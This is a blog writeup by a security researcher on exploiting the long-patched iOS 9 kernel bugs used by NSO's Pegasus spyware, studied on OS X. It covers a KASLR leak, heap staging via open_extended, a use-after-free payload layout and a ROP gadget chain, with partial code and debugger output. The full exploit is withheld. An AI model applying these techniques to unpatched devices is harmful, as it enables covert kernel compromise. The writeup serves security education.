Revisiting Pegasus on iOS9

Jul 2, 2022

What follows is a writeup of the kernel bugs NSO Group’s Pegasus spyware exploited in iOS 9, specifically versions 9.3.4 and earlier. The spyware was discovered and the vulnerabilities patched roughly six years ago.

Why now? Well, “now” isn’t exactly the right word; I wrote this up just over four years ago. At the time, my intent wasn’t to publish. Rather it was to better understand the practical aspects of exploiting kernel bugs in XNU, iOS’s and macOS’s kernel. As I explain in the writeup, there’s often a lot of discussion of bugs themselves, and sometimes some superficial discussion of their exploitability. But there’s rarely a soup-to-nuts discussion along the lines of “What do these bugs actually get you? What does exploiting kernel bugs on iOS actually look like, and what do you next, having exploited them?”. I wanted to understand those aspects of kernel exploitation, so I went through the exercise of exploiting the bugs myself, in as similar a manner as possible to what Pegasus did. I wanted to understand the challenges of:

The exploit development process
Exploiting the bugs reliably, and without destabilizing the target
Using the exploited kernel to practical effect

So I wrote up what I learned along the way.

I recently blew the dust off this writeup and spent some time with it. Even though a lot has changed in iOS & XNU in the years since, I still personally found it to be an interesting read. There’s a lot I had forgotten! More importantly I think there’s a lot of still-relevant theory here.

There’s also a lot of practical nitty gritty along the lines of “I dumped a bunch of kernel memory, but how do I find a pointer I should care about?”. Or “how do I coax information out of LLDB about these kernel structures?”.

I should say, inexperienced in this area as I was, I literally spent months of personal weekend & evening time on the project, plus weeks more on the writeup. I’m sure there’s stuff that’s incorrect, or stuff I thought was cool and novel that would be plainly obvious to others. I welcome (constructive!) feedback from anyone who is inclined to share.

I would also add that I made it close but not quite to the writeup’s stated goal. As such, things get increasingly loose and speculative toward the end. I apologize in advance! I did my best to clean up and clarify things where I could, while preserving the essence of my original experience. With that in mind, I would give the reader this bit of advice: read for as long as it’s interesting and things make sense, but no further. If and when stuff gets weird, don’t feel bad about getting off the train, having enjoyed the journey to that point.

Oh and one last thing. This is highly atypical for me, but I’m not publishing my exploit code for this. Not that I don’t want to or feel that I shouldn’t. The problem is it’s a mess. Cleaning it up for public consumption would take more time and effort than I have available. I do apologize, and I hope that doesn’t keep this from being useful.

Anyway, I hope you enjoy the read!

Cheers, Zach

Practical Exploitation of Pegasus Kernel Vulnerabilities

March 2018

Synopsis

This article is an exploration of the practical aspects of exploiting the kernel bugs used by the Pegasus iOS malware which targeted iOS 9. It is less a discussion of the vulnerabilities themselves and instead focused on concrete details of exploitation and post-exploitation.

Motivation

I wanted to learn more about the practical aspects of kernel exploitation and modern memory corruption techniques.

I also wanted to cultivate an understanding of kernel internals, particularly from an offensive perspective.

My goal was to develop a sufficiently complete exploit to facilitate post-exploitation activity. There is abundant discussion of kernel bugs and their effects, but their value to the attacker is usually left abstract. Many practical questions around exploitation are often left as exercises for the reader. For example, given primitives that allow you to arbitrarily read, write, and execute in the kernel, what would you do with those? Specifically, what memory would you read or write? Would you overwrite a data structure? If so, which one, and why? Would you call an arbitrary kernel function? To what effect?

Perhaps the most motivating factor, however, was frustration while reading Lookout’s technical Pegasus paper. While it is probably the most detailed and complete literature on the topic, much of it is confusingly organized and impenetrable. I worked through the exercise of exploiting the bugs myself in order to demystify what the paper was attempting to describe.

This writeup’s target audience is the version of myself that existed just prior to my first attempt to read through the Lookout paper.

Note: When researching these bugs and their exploitation, I targeted OS X 10.11.3 (15D21) in order to take advantage of the convenience of a virtual machine. Although iOS and arm64 imposes constraints not present with OS X and x86-64, I worked within those constraints anyway, in order to better understand Pegasus’s actual exploitation process. As such, much of the discussion below, such as disassembly fragments and ROP gadgets, will be in the context of x86-64. But the concepts translate directly to kernel exploitation on iOS and arm64.

Prerequisite Reading

Analysis and Exploitation of Pegasus kernel vulnerabilities by jndok

tfp0 powered by Pegasus by Siguza

Technical Analysis of the Pegasus Exploits on iOS by Lookout

Overview of Pegasus Kernel Vulnerabilities

The Pegasus kernel vulnerabilities have been discussed and documented at length. Siguza’s cl0ver article presents an excellent technical description. As a refresher, however, here’s a brief description:

OSNumber Information Leak

It’s possible to:

Craft a serialized dictionary with a malformed OSNumber
Create a user client object in the kernel, and set properties on it with the specially crafted dictionary
Read the properties back out in order to leak kernel data from kernel memory

The OSNumber class in XNU’s IOKit allowed an arbitrary number of bits to be specified for its size. So instead of an OSNumber that’s 32 or 64 bits, one can be specially crafted to be, say, 4096 bits. When the OSNumber property gets serialized back to userspace, its value gets placed on the stack and then the number of bytes that represent the size (number of bits / 8) get copied into the serialized buffer. As a result, an arbitrary amount (512 bytes in the case of a “4096” bit number) of kernel memory from the current thread’s stack can be copied to userspace.

OSUnserializeBinary Use-after-Free

In the function OSUnserializeBinary(), serialized data from userspace is unpacked into an object graph composed of several IOKit property data types or their container types. These types are congruent to plist data types:

dictionary
array
number (real and integer)
string
data
boolean
date

In addition there’s a special “object reference” which allows an object elsewhere in the graph to be referenced from one or more other locations.

The topmost object in the graph is typically a dictionary. When unserializing a dictionary, the function expects OSSymbols for dictionary keys but will tolerate OSStrings. In the case of an OSString, (named o in this function) in it coerces the string into the desired OSSymbol then releases the original string object, o. And here’s the bug: though it released o, OSUnserializeBinary() maintains an off-the-books reference to it. Later during unserialization, if another serialized object is a back-reference to the string, the dangling reference is used once more.

In the mean time, the memory for o has been freed and possibly reallocated. It may now contain attacker-controlled data. As a result, the attacker gets to decide what happens when o->retain() gets called on the freed object. The technical aspects of this bug are expanded further in the sections Payload Anatomy, How OSString Works, and Use-After-Free Dictionary and Payload Construction.

Interfacing with IOKit and Triggering the Bugs

A non-trivial part of the exploit’s userspace component involves boilerplate code to interact with IOKit kernel interfaces. Those details will not be discussed in this writeup. The reader is advised to read jndok’s and Siguza’s writeups and git repos, as well as the Lookout paper for detailed examples.

Kernel Exploitation Goal

The goal of Pegasus’s kernel exploit is to patch the kernel in such a way that post-exploit userspace code may stably read and write arbitrary kernel memory, as well as call arbitrary kernel functions with some number of userspace controlled arguments (or more generally execute arbitrary kernel code). More to the point, once the kernel is patched, it will no longer be necessary to exploit vulnerabilities that risk destabilizing the system. The patch sets up a generic read-write-execute framework that does not require further exploitation. This is discussed at length in the Post-Exploitation: Gaining Reusable Read, Write, and Execute section.

Exploitation Sequence

The exploitation sequence is approximately as follows:

Leak Kernel ASLR slide via OSNumber
Create payload staging thread for 2nd stage payload
Leak an oracle from kernel memory that predicts location of stage 2 payload
Craft 2nd stage payload with memory references to itself, obtained from oracle
Pre-stage payload 2, blocking indefinitely on open_extended()
Craft 1st stage payload, with pointers to the 2nd stage payload, obtained from oracle
Use a specially crafted, malicious dictionary containing 1st stage payload, trigger user-after-free
Gadget chain in 2nd stage payload patches a key kernel structure
Thread terminates gracefully without panicking kernel
Patched kernel now exposes custom interface to allow arbitrary read, write, and execute from unprivileged userspace

Serialized Data Format

IOKit’s in-kernel unserializer, OSUnserializeXML handles two serialized data formats: an XML format closely related to plist XML (as indicated by the function name), and a binary format. In the case of binary serialized data (indicated by a magic number at the start), OSUnserializeXML() calls OSUnserializeBinary(), which is where the use-after-free occurs.

CoreFoundation types (such as CFArrayRef, CFDictionaryRef, CFStringRef, etc.) can be serialized in userspace using IOKit’s IOCFSerialize(). The researcher may find it useful to generate different constructs (arrays and dictionaries, containing other arrays, dictionaries, strings, and object references), and then serializing those to both XML and binary. When attempting to understand this format, it’s helpful to compare the two (using a hex editor to view the binary version) to study how serialized structures in the binary format equate to their XML counterparts.

Understanding the binary format is essential because system-provided frameworks are insufficient for generating the data structures used in exploitation. System frameworks will only produce valid serialized structures. For exploitation, the researcher needs greater control in order to generate the invalid structures that will trigger the vulnerabilities.

This article won’t comprehensively describe the serialized data format; it has been more than adequately described by jndok and Siguza. Instead, what follows are few relevant high points.

OSUnserializeBinary() expects a buffer that starts with the appropriate magic number, followed by a series of 32-bit metadata fields. Each metadata item identifies what kind of object it describes, that object’s length, and whether this is the final object in the current collection. A metadata item is followed by the actual data it describes. For container types, this data would be additional metadata/data pairs. For non-container types, such as strings, integers, and booleans, the data would be the actual bytes for that object, zero-padded out to a 4-byte boundary.

Take as an example a metadata item for an OSDictionary containing two entries. The dictionary is the last item in its collection:

uint32_t metadata=kOSSerializeDictionary | 0x2 | kOSSerializeEndCollection

The next four bytes would be the metadata for the first dictionary key, which would be followed by the literal bytes for that key, and so on.

It should be noted that for a given object what is meant by length depends on the type of object. For arrays, length is the number of items in the array. In contrast for an OSNumber, length is the number of bits required to represent the number, such as 32 or 64.

For a better understanding of IOKit serialization, it is recommended the reader study jndok’s and Siguza’s writing on the subject while experimenting with example code using CoreFoundation container types.

Leak KASLR Slide

The kernel’s address in memory is randomized at each boot by an 8-bit slide and must be determined by the exploit code at run time. This allows the code to determine kernel offsets of gadgets used in the payload, as well as the location of critical data structures that must be leaked or patched.

Fortunately for the attacker, the OSNumber information leak is a powerful primitive, making it possible to leak an arbitrary amount of the current function’s call stack. It is easy to locate the return address of the calling kernel function, and compare that to what the return address would be with an unslid kernel. The difference between the two is the kernel slide.

Payload Anatomy

Pegasus’s payload consists of two parts. The first, smaller payload is contained in the malicious, serialized dictionary that is unserialized by OSUnserializeBinary(). The second, larger payload gets staged ahead of time using a non-posix variant of the open() system call, called open_extended().

Due to the way kernel memory allocation zones work, the first payload is limited in size to 32 bytes. If it’s larger, it will be allocated in a different zone than the OSString object that is freed, so the use-after-free never occurs.

An example of a broken dictionary to exploit the use-after-free might look something like:

    <dict>
        <string id="0">"AAA"</string>
        <data>[   0-7  |  8-15  | 16-23 | 24-31  ]</data>
        <string IDREF="0" />
    </dict>

The XML representation above is for ease of illustration; the actual payload would be in the binary format. As you can see, the dictionary contains a 32-byte string that serves as the initial payload.

This dictionary is clearly broken in a few ways. The first string object ("AAA") serves as a dictionary key, and the subsequent data object is that key’s corresponding value. After this first key/value pair comes a second key. This key is an object reference to the first key, which violates the contract of a dictionary: no duplicate keys. Additionally, this second key has no corresponding value. None of this matters, though, as the use-after-free occurs before OSUnserializeBinary() has a chance to reject the malformed data.

In order to understand the composition of the first payload, it’s worth revisiting the use-after-free vulnerability briefly.

As a refresher, the unserializer prefers every dictionary key to be an actual <key> object, which becomes an OSSymbol in the kernel. It will, however, permit string objects to be used as dictionary keys instead. In this case, an OSSymbol object is constructed from an OSString, and the string object is freed before unserialization continues.

Later, when an object reference (the IDREF=“0” in the above XML) is encountered, no new object is created. Instead, the object being referenced is located and its reference count increased:

case kOSSerializeObject:
    if (len >= objsIdx) break;
    o = objsArray[len];
    o->retain();
    isRef = true;
    break;

The o retrieved from the objects array has been freed and hopefully replaced by the 32-bytes of data from our <data> object. When o is dereferenced it will be interpreted as an OSString object. When the address of the virtual retain() function is looked up, the 32-byte payload must point to a buffer than can be interpreted as a virtual function table.

How OSString Works

In order to understand how to construct the first stage payload, it helps to understand the OSString a bit.

If an OSString instance was represented as a C struct, it might look a little like:

struct OSString
{
	void      ** vtab;          //8 bytes
	int          retainCount;   //4 bytes
	unsigned int flags;         //4 bytes
	unsigned int length;        //4 bytes + 4-byte pad for alignment
	const char * string;        //8 bytes
}

When o->retain() is called, the retain function is looked up in the OSString object’s virtual function table. This disassembles to:

mov     rax, [rbx]; derefernce 'o', obtaining its vtable pointer
mov     rdi, rbx;   move object pointer into, rdi. 'this' pointer for retain()
call    qword ptr [rax+20h] ; Call [vtable+0x20], theoretically pointer to retain().

Our attacker-controlled 32-byte “OSString” doppleganger doesn’t point to executable code of our choosing. Instead it needs to point to an attacker-controlled buffer which, in turn, will point to arbitrary executable code.

In theory, the first stage payload could point back into itself. However there’s no way to leak the address of this buffer prior to triggering the use-after-free. Plus, 32-bytes isn’t much to work with, and the first eight of those are spoken for. Instead, we can point it to a second attacker-controlled buffer which will masquerade as a virtual function table, pointing to whatever code we would like to execute in place of retain().

Staging Payload Part 2

As discussed above, the 32-byte payload in the malformed dictionary mimics an OSString object and must point to a second stage buffer which mimics a vtable. We need to control the contents of that second buffer and also know its address in advance.

In addition to mimicking a vtable, the stage 2 payload must represent a chain of gadgets and arguments to those gadgets. Each gadget’s jump or return address must be populated from this buffer.

This larger payload must be staged in advance so that the fake OSString can reference it.

How open_extended() works

A non-POSIX variant of the open() syscall, open_extended(), can be abused to stage an attacker-controlled buffer in memory.

The open_extended() system call allows the caller to provide a filesystem ACL structure containing an arbitrary number (zero or more) of ACL entries. Rather than copy in a minimum amount of data from userspace to parse the start of the applicable structures and calculate the number of ACLs to copy in, it copies in more than it needs on the first try. The thinking is that the caller likely provided a small number of (or zero) ACLs, and if there is more, it can circle back and copy the rest.

open_extended() copies in the remainder of the page containing the ACL structures. By ensuring the ACL structures and the payload data are created in a page-aligned buffer, the attacker can maximize the amount of data copied from userspace to kernel memory.

The following comment in kauth_copyinfilesec() explains this behavior succinctly:

//File: xnu-3248.30.4/bsd/kern/kern_authorization.c

/*
 * Make a guess at the size of the filesec.  We start with the base
 * pointer, and look at how much room is left on the page, clipped
 * to a sensible upper bound.  If it turns out this isn't enough,
 * we'll size based on the actual ACL contents and come back again.
 *
 * The upper bound must be less than KAUTH_ACL_MAX_ENTRIES.  The
 * value here is fairly arbitrary.  It's ok to have a zero count.
 */

There isn’t a userspace stub or function declaration for open_extended(). It must be called using syscall() and the syscall number, SYS_open_extended. If there was a function declaration, however, it would look like this:

int
open_extended(char *path, int flags, uid_t owner, gid_t group, mode_t mode, struct kauth_filesec *fsacl);

The optional kauth_filesec struct is composed like so:

// xnu-3248.30.4/bsd/sys/kauth.h
/* File Security information */
struct kauth_filesec {
   u_int32_t   fsec_magic;
#define KAUTH_FILESEC_MAGIC    0x012cc16d
   guid_t      fsec_owner;
   guid_t      fsec_group;

   struct kauth_acl fsec_acl;
};

That structure contains a kauth_acl struct:

//File: xnu-3248.30.4/bsd/sys/kauth.h
/* Access Control List */
struct kauth_acl {
   u_int32_t   acl_entrycount;
   u_int32_t   acl_flags;

   struct kauth_ace acl_ace[1];
};

Knowledge of the kauth_ace struct’s composition is unnecessary, as we will set fsec_acl.acl_entrycount to KAUTH_FILESEC_NOACL. We aren’t providing any ACL entries. In place of the ACLs, we’ll include the stage 2 payload.

Although it isn’t strictly necessary, we can apply the same calculations as the kernel to work out the maximum amount of ACL data copied in, in the optimal case of a page-aligned buffer: 812 bytes.

#define mach_vm_round_page(x) (((mach_vm_offset_t)(x) + vm_page_mask) & ~((signed)vm_page_mask))
#define KAUTH_FILESEC_SIZE(c)       (__offsetof(struct kauth_filesec, fsec_acl) + \
									__offsetof(struct kauth_acl, acl_ace) + \
										(c) * sizeof(struct kauth_ace))

size_t calc_kauth_copyin_size(user_addr_t xsecurity)
{
	user_addr_t uaddr;
	user_addr_t known_bound;
	uint32_t count;
	size_t copysize;
	printf("size of struct kauth_filesec: %lu\n",sizeof(struct kauth_filesec));
	known_bound = xsecurity + KAUTH_FILESEC_SIZE(0);
	printf("known_bound: %016llx\n",known_bound);
	uaddr=mach_vm_round_page(known_bound);
	printf("uaddr: 0x%016llx\n",uaddr);
	count = (uaddr - known_bound) / sizeof(struct kauth_ace);
	printf("count:%u\n",count);
	if (count > 32)
		count = 32;
	printf("offset of fsec_acl: %lu\n",__offsetof(struct kauth_filesec, fsec_acl));
	printf("offset of acl_ace: %lu\n",__offsetof(struct kauth_acl, acl_ace));
	printf("size of struct kauth_ace: %lu\n",sizeof(struct kauth_ace));
	copysize = KAUTH_FILESEC_SIZE(count);

	return copysize;
}

Note: In order to allocate a page-aligned buffer on the stack, Pegasus goes through nontrivial contortions, which the lookout paper doesn’t explain particularly well. It’s unclear why, however, since there are easier ways to get such an aligned buffer, such as using mach_vm_allocate().

Making the Payload Hang Around

Using open_extended() to stage an attacker-controlled buffer presents a small problem.

Let’s look at an abbreviated form of the function:

    int
    open_extended()
    {
      ...

        kauth_copyinfilesec(uap->xsecurity, &xsecdst);

      ...

        ciferror = open1(vfs_context_current(), &nd, uap->flags, &va,
                fileproc_alloc_init, NULL, retval);

        if (xsecdst != NULL)
            kauth_filesec_free(xsecdst);

        return ciferror;
    }

As can be seen above, the kauth_filesec_t structure containing the attacker-controlled payload gets freed just before the return. Working around this is straightforward, however. In a separate thread, we simply need to lock the file that open_extended() will open.

fd=open(path,O_CREAT|O_RDWR|O_EXLOCK,0600);

This advisory lock will cause open_extended() to block in open1() assuming it is passed the lock flag as well:

fd=open_extended(path,O_RDWR|O_EXLOCK,owner,group,mode,(struct kauth_filesec *)payload);

How the Oracle Works

We need to not only control the contents of a second, larger buffer. We must also know the address of that buffer in advance. The bespoke, serialized dictionary that will trigger the use-after-free must point to the second stage payload as if that buffer is OSString’s vtable.

Two things we know to be true:

OSNumber dumps an arbitrary amount of data from the current thread’s stack.
The second payload is staged in a separate thread, because that thread must block forever.

From this it becomes clear the OSNumber leak must:

Leak the address of the second payload from the same thread in which that payload is staged
Leak the address prior to the second stage payload getting staged and prior to that kernel buffer getting allocated

How does the info leak predict the address of the second stage buffer? It turns out that the process of triggering the leak allocates a buffer whose address will be placed on the stack. This buffer will be immediately freed and reallocated in open_extended().

In LLDB, we can investigate what pointer is leaked, what’s special about it, and why it comes from the same allocation zone as the kauth_filesec allocation containing the payload.

Here’s an XML representation of the serialized dictionary used to trigger the leak.

<dict>
	<key>
		"ararararararararararararararararararararara"
		"ararararararararararararararararararararara"
		"ararararararararararararararararararararar"
	</key>
	<number size=0x200>
		0x4141414141414141
	</number>
</dict>

Above, the property name is a suspiciously long string used by Pegasus. Does this influence the heap in some way? Additionally, we have the value set to the Hacking Number of 0x4141414141414141. And the size, 0x200, or 512, is the number of bits we’re specifying for the OSNumber. When the number is serialized the object’s numberOfBytes() method is called which converts bits to bytes:

//File: xnu-3248.30.4/iokit/Kernel/IOUserClient.cpp
offsetBytes = off->unsigned64BitValue();
len = off->numberOfBytes();

//File: xnu-3248.30.4/libkern/c++/OSNumber.cpp
unsigned int OSNumber::numberOfBytes() const { return (size + 7) / 8; }

Here’s sample output from the info leak:

[@] String data length: 128
[@] Padded length for string data: 128
[@] String data length: 8
[@] Padded length for string data: 8
[@] leaksize: 512
[@] 00: 0x4141414141414141
[@] 08: 0xffffff801441de78
[@] 16: 0xffffff8017d16400 <--Info leak oracle

By setting a breakpoint in is_io_registry_entry_get_property_bytes() we can have a look at the stack and see what our leaked pointer correlates to:

(lldb) breakpoint set -f IOUserClient.cpp -l 2669
Breakpoint 1: where = kernel.development`::is_io_registry_entry_get_property_bytes(io_object_t, char *, char *, mach_msg_type_number_t *) + 125 at IOUserClient.cpp:2669, address = 0xffffff800e4b77ad

Then run the exploit code (or even better, just a leak PoC that doesn’t crash).

(lldb) c
error: Process is running.  Use 'process interrupt' to pause execution.
Process 1 stopped
* thread #25, name = '0xffffff8018624950', queue = 'cpu-0', stop reason = breakpoint 3.1
frame #0: 0xffffff800e4b77ad kernel.development`::is_io_registry_entry_get_property_bytes(registry_entry=0xffffff8017d16400, property_name="ararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararara", buf="", dataCnt=0xffffff80143525cc) at IOUserClient.cpp:2669 [opt]

Various inlined functions confuse the debugger, so single-stepping doesn’t work well. We can, however, set a new breakpoint just before the oversized OSNumber object gets copied from the stack:

(lldb) breakpoint set -f IOUserClient.cpp -l 2704
Breakpoint 4: where = kernel.development`::is_io_registry_entry_get_property_bytes(io_object_t, char *, char *, mach_msg_type_number_t *) + 541 at IOUserClient.cpp:2704, address = 0xffffff800e4b794d
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #25, name = '0xffffff8018624950', queue = 'cpu-0', stop reason = breakpoint 4.1
    frame #0: 0xffffff800e4b794d kernel.development`::is_io_registry_entry_get_property_bytes(registry_entry=<unavailable>, property_name=<unavailable>, buf="", dataCnt=0xffffff80143525cc) at IOUserClient.cpp:2704 [opt]
2701            ret = kIOReturnIPCError;
2702        else {
2703                *dataCnt = len;
-> 2704             bcopy( bytes, buf, len );
2705        }
2706        }
2707        obj->release();
Target 0: (kernel.development) stopped.

Now, just before the copy happens, let’s inspect the stack:

0xFFFFFF8012C2BDC0: 00 64 D1 17 80 FF FF FF | .d...... | 0xFFFFFF8017D16400 => 0xFFFFFF7F8F211F30 => 0xFFFFFF7F8F2089A2 => "UH"
0xFFFFFF8012C2BDB8: 78 BA 2F 14 80 FF FF FF | x./..... | 0xFFFFFF80142FBA78 => ""
0xFFFFFF8012C2BDB0: 41 41 41 41 41 41 41 41 | AAAAAAAA |
[stack]

The first value on the stack is the 0x4141414141414141 of our OSNumber. Skipping the second, the third value on the stack is our oracle: 0xFFFFFF8017D16400.

Looking back at the function arguments LLDB showed, we see this is the registry_entry argument:

kernel.development`::is_io_registry_entry_get_property_bytes(registry_entry=0xffffff8017d16400,

The kernel dSYM provides a set of LLDB macros for inspecting ioregistry data:

(lldb) command script import "kernel.development.dSYM/Contents/Resources/Python/lldbmacros/ioreg.py"

The showobject macro should help, but it raises an exception. Let’s inspect the object another way: by looking at its vtable to determine what class it’s part of. The vtable is the first pointer in the class structure:

(lldb) p (*(void **)registry_entry)
(void *) $245 = 0xffffff7f8f211f30

Based on the address(0xffffff7...), that vtable appears to be part of a kernel extension. What kernel extension?

(lldb) showkextaddr 0xffffff7f8f211f30
kmod_info            address              size                  id  refs              version name
0xffffff7f8f214940   0xffffff7f8f203000   0x19000               17     0                417.2 com.apple.driver.DiskImages    offset =  0xef30

It appears to be com.apple.driver.DiskImages. If we have symbols, we can load them into LLDB:

(lldb) addkext -N com.apple.driver.DiskImages                                                                                                                                     Fetching dSYM for 97177a33-27bd-34a9-9b42-1173be480bcd
Adding dSYM (97177a33-27bd-34a9-9b42-1173be480bcd) for /Library/Caches/com.apple.bni.symbols/uuidsymmap.apple.com/dsyms/SUGalaDanceHW/DiskImages_kexts/DiskImages_kexts-417.2~92/97177A33-27BD-34A9-9B42-1173BE480BCD/IOHDIXController

If it’s a kext for which you don’t have symbols, a disassembler such as IDA Pro can help resolve what class this vtable belongs to.

With the kext loaded, we can try showobject again:

(lldb) showobject 0xFFFFFF8014A99800
`object 0xffffff8014a99800, vt 0xffffff7f8f211f20 <vtable for IOHDIXControllerUserClient>, retain count 6, container retain 0`

The registry_entry object (and the leaked pointer) turns out to be a IOHDIXControllerUserClient object. This makes sense because that’s the IOService we’re querying in our exploit code:

serv=IOServiceGetMatchingService(master,IOServiceMatching("IOHDIXController"));

If this pointer predicts the location of our payload, it must come from the same allocation zone. What zone does it comes from? It turns out IOHDIXControllerUserClient is quite large:

(lldb) call sizeof(IOHDIXControllerUserClient)
(unsigned long) $431 = 528

It’s 528 bytes. The largest kalloc zone smaller than kalloc.1024 (where our 800+ byte payload gets allocated) is kalloc.512. That means IOHDIXControllerUserClient objects likely come from the same zone.

After triggering the leak, it’s important to clean up the IOKit connection:

if(object)
{
	IOObjectRelease(object);
}
if(iter)
{
	IOObjectRelease(iter);
}
if(conn)
{
	IOServiceClose(conn);
}

Doing so causes the UserClient object to be released and added back to the kalloc.1024 freelist. If we’re fast enough calling open_extended(), that same chunk of memory will get reallocated for the kauth_filesec struct and our payload.

Surprisingly this appears unrelated to the long, peculiar property name used by Pegasus, which remains unexplained.

Improving reliability of payload staging

The zone our payload gets allocated in, kalloc.1024 is a busy one. Even with the oracle predicting our payload address, it’s quite likely that predicted address will get allocated for something else and the payload won’t land where we expect.

There are a couple of things that can help. First, we can start a bunch of threads all trying to open_extended the lockfile at once:

static void *openx_loop(void *unused)
{
	int fdx;
	uid_t owner=getuid();
	gid_t group=getgid();
	int flags=O_RDWR|O_EXLOCK;
	int mode=S_IRWXU|S_IRWXG|S_IRWXO;

	while(!fsacl_g)
	{
		continue;
	}

	fdx=open_extended(openx_path_g,flags,owner,group,mode,(struct kauth_filesec *)fsacl_g);

	if(fdx<0)
	{
		perror("open_extended");
		log_err("open_extended() should have blocked.\n");
		return NULL;
	}
	log_err("open_extended() should have blocked but returned: %d\n",fdx);
	close(fdx);
	return NULL;
}

int create_openx_threads(size_t threadcount,pthread_t *threadlist)
{
	int i;
	pthread_t busy_thread;
	for(i=0;i<threadcount;i++)
	{
		if(pthread_create(&busy_thread,NULL,openx_loop,NULL)!=0)
		{
			perror("pthread_create");
			log_err("Failed to create thread and stage payload.\n");
			exit(EXIT_FAILURE);
		}
		threadlist[i]=busy_thread;

	}
	return 0;
}

This improves the likelihood that at least one of the attempts to block on opening the lockfile will stage the payload in the right place.

Additionally, creating a set of threads that each spin in a CPU-intensive busy loop so as to slow the whole system down and make it easier to win the race. Be mindful not to:

Make the busy loop easy for the compiler to optimize away
Make context switches such as via system calls

Use-After-Free Dictionary and Payload Construction

Note: This section gets deep into the process of describing gadgets in the kernel and how they can be chained together to do what we need. Obviously, most of the gadgets here would be different or unavailable on an arm64 target. The goal here is not to precisely reconstruct Pegasus’s gadget chain, but rather to work through the challenge of building a chain that accomplishes the same thing, and to understand how gadgets can be combined in powerful ways.

With the second payload staged in memory, we must construct the corrupt dictionary containing the first stage payload.

For the discussion below reference the source fragment above from the use-after-free site (see Payload Anatomy) as well as the hypothetical OSString struct described above (see How OSString Works).

Below is x86-64 disassembly of the use-after-free site:

mov     [rbp+var_5C], edx
mov     eax, ebx
mov     rbx, [rdi+rax*8];
mov     rax, [rbx]          ;rax = o->vtable
mov     rdi, rbx            ;rdi = o
call    qword ptr [rax+20h] ; call [vtable +0x20]
							; UaF here: o->release()

Above, the object is dereferenced and its vtable pointer is loaded into rax. Since we control the 32-byte object structure, we can determine the “vtable” that it points to. This ends up being some offset relative to the second payload staged previously. Then the object pointer itself is loaded into rdi. Finally, the “vtable” is dereferenced and a function pointer (or arbitrary .text address) at offset 0x20 is called.

Referencing the corrupt dictionary from above, the 32-byte <data> object starts to take shape:

<data>[payload2-0x20|  8-15  | 16-23 | 24-31  ]</data>
           ^
           |
           +------The payload2 pointer is interpreted as the vtable address.
                  We need to adjust it by -0x20 to account for the `rax+0x20`.

The address at 0x20 into the vtable ends up being the first gadget that gets called. That gadget will still have a handle on this object pointer which was loaded into rdi.

First Gadget

The lookout paper was particularly vague on the gadget chain executed by the use-after-free. The only specific gadget that it calls out is OSSerializer::serialize( OSSerialize * s ):

__int64 __fastcall OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)
push    rbp
mov     rbp, rsp
mov     rdx, rsi
mov     rax, [rdi+20h]
mov     rcx, [rdi+10h]
mov     rsi, [rdi+18h]
mov     rdi, rcx
pop     rbp
jmp     rax

This is an unusually useful gadget (also a rare instance of one that works the same on both architectures) for setting up and dispatching other gadgets. It has the following unique properties:

Calls an attacker-specified function (or arbitrary .text address)
First two function arguments are attacker-provided (rdi and rsi)
Stack neutral (jmp rather than call, and push/pop are balanced)
Potentially maintains a pointer to attacker’s buffer in rcx

Further, two successive calls into this gadget can be chained for the purpose of staging a third function argument in rdx (the canonical 3rd argument register on x86-64). Note that at the start of the gadget, rsi is saved to rdx. A three-argument function call simply requires:

The first pass to put argument three in rsi
The second pass to move that third argument to rdx, and…
Stages arguments one and two into rdi and rsi respectively.

This is exceptionally useful for calling functions requiring three parameters such as copyout() and copyin().

It is unlikely, however, this is the actual first gadget in the chain. Recall the OSString object (pointed to by rdi) is 32 bytes on 64-bit architectures. But the gadget above loads rax from rdi+32, or 40 bytes into the attacker’s first payload. Recall that we can’t make the first payload larger than 32 bytes, due to allocation zones. The only way to use this gadget is to jump first into another gadget that will adjust rdi by either reducing it by eight bytes or making it point into our second payload.

An ideal gadget for this is _IOOpenServiceIterator::isValid()

__int64 __fastcall _IOOpenServiceIterator::isValid(_IOOpenServiceIterator *__hidden this)
push    rbp
mov     rbp, rsp
mov     rdi, [rdi+10h]; rdi no longer points to payload1, and now points into payload2.
mov     rax, [rdi]
pop     rbp
jmp     qword ptr [rax+120h]

Above, we grab a pointer from rdi+16 and load it into rdi. Then, from the new rdi we load a pointer into rax. From there we jump to whatever address is pointed to by rax+0x120.

This gadget has the following useful properties:

Stack neutral
Pivots rdi to point into the attacker’s larger buffer
Jump into an attacker-specified function or other executable location

Pivoting rdi to point into our second payload sets up the OSSerializer::serialize() gadget.

Our 32-byte buffer comes into clearer focus:

payload1---------------+
                       |
      /----------------+--------------------\
      |                                     |
<data>[payload2-0x20|  8-15  |payload2+8| 24-31  ]</data>
           ^
           |                    ^
           |                    |
           |                    +----1st gadget loads payload2's 2nd pointer into rdi
           |
           +------The payload2 pointer is interpreted as the vtable address at o->release().

Gadget Chaining with the Stage-2 Payload

By the time we finally jump into the OSSerializer::serialize() dispatch gadget, we’ve referenced the second stage payload three times. The layout for that payload that is taking shape is:

Payload 2:
      +---called by o->release()
      |   (_IOOpenServiceIterator::isValid)
      |
      |                  +--loaded into rax by gadget1
      |                  |  The *address of this* is loaded
      |                  |  into rdi
      |                  |                  +--jumped to by gadget1 via:
      |                  |                  |  jmp     qword ptr [rax+120h]
      |                  |                  |
      v                  v                  v
[gadget1 address | payload2-0x120+16 | OSS::serialize |    ...    |   ....               ]
[      0-7       |       8-15        |     16-23      |   24-31   |   32-800+            ]
                         |                 ^
                         |                 |
                         +---points here---+
                           (after +0x120)

At the first jump into the OSSerializer:serialize gadget, rdi points to payload2+16. serialize then proceeds to dereference rdi +0x10, 0x18, and 0x20 for rdi, rsi, and rax (the next gadget) respectively.

As long as any of the next gadgets can ensure rdi points to some offset into payload2, it can jump into OSSerializer::serialize and repeat the process again. We can repeat this process as many times as necessary, giving us effectively arbitrary kernel execution.

Continuation of Execution

Among the ways exploiting AlephOne-style stack-smashing bugs was straight-forward was the lack of requirement of continuation of execution. This is to say it usually wasn’t necessary for the exploited process to continue executing and remain stable. The various structures in the target process’s memory could be completely wrecked by the exploit. Generally exploitation ended in a system call to execve() which would replace the process image with a shell or some other process. From there, if necessary, the vulnerable process could simply be restarted.

When exploiting kernel bugs, this is not the case. Wrecking the target’s address space would result in a panic, and is clearly undesirable.

Having successfully triggered an attacker-controlled chain of execution and gracefully returned to the call site, we have yet another challenge. We’re still left with a blob of corrupt, arbitrary data being interpreted as an OSString. We need to clean that up somehow.

